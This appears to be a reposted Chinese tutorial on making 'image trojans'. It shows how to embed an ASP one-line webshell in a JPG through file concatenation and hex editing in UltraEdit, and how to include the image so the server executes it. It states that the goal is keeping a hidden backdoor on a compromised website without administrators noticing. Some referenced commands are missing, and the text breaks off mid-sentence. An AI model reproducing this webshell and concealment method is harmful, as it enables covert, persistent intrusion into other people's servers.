图片木马制作的三种方法 Copy 命令制作 1.asp 内容: 打开cmd,数据一下命令: 此时打开两个jpg 文件,相比: 且打开2.jpg 可以像1.jpg 一样显示图像。 把以下代码放入目标网站,即可按 asp 执行。 <% #include files=”2.jpg”%> Uedit32(转载): 本制作来自于:雪糕。 我们通常在得到 w ebshell 之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%ex ecu te requ est("v alu e")%>到asp 文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误 错误 '800a000d' 类型不匹配: 'execute' /news1/show.asp,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp 文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'ex ecu te'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或 gif 文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:1.jpg 2.一句话木马服务器端代码: <%ex ecu te requ est("v alu e")%>(其他的一句话也行) 3.一句Script 标签: 4. 调用图片后门代码: 工具:UltraEdit 二、开始制作: 1.使用UltraEdit 打开1.jpg 文件,然后按CTRL +F 进行查找图片中的“<%”和“%>” 其中<%的十六进制代码是 3E 25,那么%>就应该是 25 3E,但是我们只把 25 改成 00; 之后我们在新建一个文本编辑窗口,将我们的script 标签代码 复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口, 复制所有的十六进制的数据,粘贴到1.jpg 的十六进制编辑窗口的最下面, 说明:为什么要粘贴到最下面? 假设你把srcipt 标签的十六进制代码粘贴到中间的...
